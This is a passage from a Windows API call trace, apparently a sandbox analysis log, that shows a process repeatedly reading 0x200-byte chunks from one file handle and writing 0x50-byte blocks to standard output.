lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.239] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.239] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] GetFileType (hFile=0x50) returned 0x1 [0236.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.240] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.241] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.241] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.242] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.242] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.243] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.243] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.245] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.245] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.246] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.246] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] GetFileType (hFile=0x50) returned 0x1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] GetFileType (hFile=0x50) returned 0x1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.247] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] GetFileType (hFile=0x50) returned 0x1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, 